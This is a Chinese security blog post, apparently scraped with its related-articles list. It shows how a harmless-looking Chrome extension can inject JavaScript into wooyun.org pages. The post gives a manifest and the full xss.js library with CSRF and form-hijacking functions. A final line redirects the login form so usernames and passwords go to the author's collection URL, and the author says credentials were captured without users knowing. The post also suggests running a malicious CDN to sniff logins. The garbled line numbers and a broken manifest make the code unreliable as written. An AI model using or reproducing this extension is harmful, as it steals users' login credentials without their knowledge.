资源来自:http://www.2cto.com/Article/201307/225986.html
首页 > 安全 > 网站安全 > 正文
利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践
2013-07-08      0个评论      
收藏    我要投稿
 
 
0x00 Chrome插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法如下:
Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?
于是,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
  "name": "XiaoChaJian",
  "version": "1.0",
  "manifest_version": 2,
  "author":"VIP",
  "icons": {
      "128": "icon.png"
   },
  "permissions": [
    "tabs","http://*/*","https://*/*"
  ],
  "content_scripts": [
    {"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}
   ]
}

contentscript.js内容:

alert(/xss/);

那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?
开始实践:
Manifest.json内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
{
  "name": "JieChiBiaoDan",
  "version": "1.0",
  "manifest_version": 2,
  
  
"author":"VIP",
  "icons": {
      "128": "icon.png"
  
  
},
  "permissions": [
    "tabs","http://*/*","https://*/*"
  ],
  
  
"content_scripts": [
    {"js":["contentscript.js"],"matches":
  
  
  
  
]
}
contentscript.js内容:
;;var xss = function(){
  var x = {
    'name':'xss.js',
    'version':'0.2.1',
    'author':'长短短(sogili)'
  };
  
  x.x=function(id){return document.getElementById(id)};
  
  //容错取值
  x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};
  
  //浏览器
  x.i={
    i:!!self.ActiveXObject&&(function(){
      for(var v=6,s=document.createElement('s');
        s.innerHTML='<![if gt IE '+(v++)+']
  
><i></i><![endif]-->',
        s.getElementsByTagName('i')[0];);
      return v;
    }()),
    c:!!self.chrome,
    f:self.mozPaintCount>-1,
    o:!!self.opera,
    s:!self.chrome&&!!self.WebKitPoint
  };
  
  //UA
  x.ua = navigator.userAgent;
  
  //判断是否为苹果手持设备
  x.apple=/ip(one|ad|od)/i.test(x.ua);
  
  //随机数
  x.rdm=function(){return~~(Math.random()*1e5)};
  
  //url编码(UTF8)
  x.ec=encodeURIComponent;
  
  x.html=function(){
    return document.getElementsByTagName('html')[0]
        ||document.write('<html>')
        ||document.getElementsByTagName
  
('html')[0];
  };
  
  /*
   * 销毁一个元素
   */
  x.kill=function(e){
    e.parentElement.removeChild(e);
  };
  
  /*
   *绑定事件
   */
  x.bind=function(e,name,fn){
    e.addEventListener?e.addEventListener
  
(name,fn,false):e.attachEvent("on"+name,fn);
  };
  
  /*
   * dom准备完毕时执行函数
   */
  x.ready=function(fn){
    if(!x.i.i){
      x.bind(document,'DOMContentLoaded',fn);
    }else{
      var s = setInterval(function(){
        try{
          document.body.doScroll('left');
          clearInterval(s);
          fn();
        }catch(e){}
      },4);
    }
  }
  
  /*
   * 同源检测
   */
  x.o=function(url){
    var link = x.dom('<a href="'+encodeURI(url)+'">',1);
    return link.protocol+link.hoatname+':'+(link.port||80)
  
==location.protocol+location.hoatname+':'+(location.port||80);
  };
  
  /*
   * html to dom
   */
  x.dom=function(html,gcsec){
    var tmp = document.createElement('span');
    tmp.innerHTML=html;
    var e = tmp.children[0];
    e.style.display='none';
    x.html().appendChild(e);
    gcsec>>0>0&&setTimeout(function(){
      x.kill(e);
    },gcsec*1000);
    return e;
  };
  
  /*
   * ajax
   */
  x.ajax=function(url,params,callback){
    (params instanceof Function)&&
  
(callback=params,params=void(0));
    var XHR = (!x.o(url)&&window.XDomainRequest)||
          window.XMLHttpRequest||
          (function(){return new ActiveXObject
  
('MSXML2.XMLHTTP')});
    var xhr = new XHR();
    xhr.open(params?'post':'get',url);
    xhr.withCredentials = true;
    try{params&&xhr.setRequestHeader('content-
  
type','application/x-www-form-urlencoded');}catch(e){}
    callback&&(xhr.onreadystatechange = function() {
      (this.readyState == 4 && ((this.status >= 200
  
&& this.status <= 300) || this.status == 304))&&callback.apply
  
(this,arguments);
    });
    xhr.send(params);
  };
  
  /*
   * CSRF
   */
  x.csrf=function(url,params,callback){
    (params instanceof Function)&&
  
(callback=params,params=void(0));
    if(params){
      var form = x.dom('<form method=post>');
      form.action=url;
      for(var name in params){
        var input = document.createElement
  
('input');
        input.name=name;
        input.value=params[name];
        form.appendChild(input);
      }
      var iframe = x.dom('<iframe sandbox
  
name=_'+x.rdm()+'_>',6);
      callback&&setTimeout(function(){
        x.bind(iframe,'load',callback);
      },30);
      form.target=iframe.name;
      form.submit();
    }else{
      var img = new Image();
      callback&&(img.onerror=callback);
      img.src=url;
    }
  };
  
  /*
   * 表单劫持
   */
  x.xform=function(form,action){
  
  
form.old_action=form.action,form.old_target=form.target,form.action=act
  
ion;
    var iframe = x.dom('<iframe name=_'+x.rdm()+'_>');
    form.target=iframe.name;
    setTimeout(function(){
      x.bind(iframe,'load',function(){
  
  
form.action=form.old_action,form.target=form.old_target,form.onsubmit=n
  
ull,form.submit();
      });
    },30);
  };
  
  /*
   * 函数代理
   */
  x.proxy=function(fn,before,after){
    return function(){
      before&&before.apply(this,arguments);
      var result = fn.apply(this,arguments);
      after&&after.apply(this,arguments);
      return result;
    }
  };
  
  return x;
}();
xss.xform(document.forms[1],'http://vip.yupage.com/wy.php');//劫持表单

http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:

开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。

再去看看,用户名密码已经躺在那里了。

在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。
0x01 CDN
---------------
现在有许许多多的网站使用了CDN来进行加速/防D等。
去搜索了下CDN的工作原理,大概是这样的。
用户访问-》自动分配最快的节点-》请求原服务器-------
返回给用户《-返回给节点服务器《-原服务器返回数据<-|
那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?
 

利用Chrome插件向指定页面植入js,劫持 XSS的更多相关文章

  1. 前端性能优化之利用 Chrome Dev Tools 进行页面性能分析

    背景 我们经常使用 Chrome Dev Tools 来开发调试,但是很少知道怎么利用它来分析页面性能,这篇文章,我将详细说明怎样利用 Chrome Dev Tools 进行页面性能分析及性能报告数据 ...

  2. 利用chrome插件批量读取浏览器页面内容并写入数据库

    试想一下,如果每天要收集100页网页数据甚至更多.如果采用人工收集会吐血,用程序去收集也就成为一个不二的选择.首先肯定会想到说用java.php.C#等高级语言,但这偏偏又有个登陆和验证码,搞到无所适 ...

  3. Chrome插件触发web页面的事件

    Chrome插件中不能直接调用Web页面的元素js,原因是chrome插件的机制http://stackoverflow.com/questions/17819344/triggering-a-cli ...

  4. chrome插件访问原始页面的变量

    开发chrome插件时遇到需要获取原始网页中的一个js变量的值问题.由于content.js和原始网页的作用域环境不同,无法直接获取变量的值,提示undefined.谷歌找到大神提供的办法.综合起来记 ...

  5. Windows下利用Chrome调试IOS设备页面

    本文介绍如何在 Windows 系统中连接 iOS设备 并对 Web 页面进行真机调试 必须前提 iOS设备.数据线 Node.js 环境 Chrome 浏览器 环境准备 安装Node环境 参考Nod ...

  6. 利用Google Chrome开发插件,在网页中植入js代码

    Google Chrome是一个很强大的浏览器,提供了各种各样的插件,大大提升了使用了的效率,比如vimium.honx等. Google在提供这些插件的同时还允许用户开发自己的插件. 最近在写js的 ...

  7. Chrome插件(Extensions)开发攻略

    本文将从个人经验出发,讲述为什么需要Chrome插件,如何开发,如何调试,到哪里找资料,会遇到怎样的问题以及如何解决等,同时给出一个个人认为的比较典型的例子——获取网页内容,和服务器交互,再把信息反馈 ...

  8. 【干货】Chrome插件(扩展)开发全攻略(不点进来看看你肯定后悔)

    写在前面 我花了将近一个多月的时间断断续续写下这篇博文,并精心写下完整demo,写博客的辛苦大家懂的,所以转载务必保留出处.本文所有涉及到的大部分代码均在这个demo里面:https://github ...

  9. 【干货】Chrome插件(扩展)开发全攻略

    写在前面 我花了将近一个多月的时间断断续续写下这篇博文,并精心写下完整demo,写博客的辛苦大家懂的,所以转载务必保留出处.本文所有涉及到的大部分代码均在这个demo里面:https://github ...

随机推荐

  1. iOS开发笔记12:iOS7上UITextField限制字数输入导致崩溃问题

    在一些场景中,需要限制用户的输入字数,例如在textField里进行控制(textView也类似,崩溃原因也相同),如图所示 系统会监听文本输入,需要注意的第一点是输入法处于联想输入还未确定提交的时候 ...

  2. Service的生命周期&Service绑定方法

    服务的生命周期: 一.采用start的方式开启服务 生命周期如下: 开启服务: onCreate()--> onStartCommand() (onStart()过时了)---> onDe ...

  3. Mac上的软件使用介绍

    目录大纲: Drop to GIF Parallels Desktop 1.Drop to GIF 功能:将视频文件可以生产动态图gif文件 网址在github上:https://github.com ...

  4. Windows 编 程中的字符串

    (1)在win32编程中,如何使用string类型 #include <string> using namespace std; LPTSTR    lpCmdLine = L" ...

  5. oracle表相关

    堆表 数据以堆的形式管理,增加数据时会使用段中找到的第一个能放下数据的自由空间,我们见到的绝大部分的表都是堆表.堆表是数据库的默认表类型. 最简单的情况是 create table test (c1 ...

  6. hibernate基本类型映射

    model包: Book.java: package model; import java.sql.Blob;import java.util.Date; public class Book {   ...

  7. JavaScript中的直接量与初始器的区别

    很多代码优化及公司规范都会提到 写对象不应该 var obj = new Object() 而应该 var obj = {} 写数组不应该 var arr = new Array() 而应该 var ...

  8. IIS7上设置MIME让其支持android和Iphone的更新下载

    Android APP的MIME: 文件扩展名:.apk MIME类型:application/vnd.android.package-archive iPhone APP的MIME: 文件扩展名:. ...

  9. 20150912华为机考1之"输入一个字符串,将其中出现次数最多的字符输出"

    不吐槽华为的服务器了,直接上正文 输入:字符串(英文字母),长度不超过128 输出:出现频率最高的字母 思路写在注释文档 /* Input a string * Output the most fre ...

  10. web工程 所需是jar包总结

    commons-beanutils-1.8.3.jar : BeanUtils主要提供了对于JavaBean进行各种操作,需要Commons -Collections包和Commons -loggin ...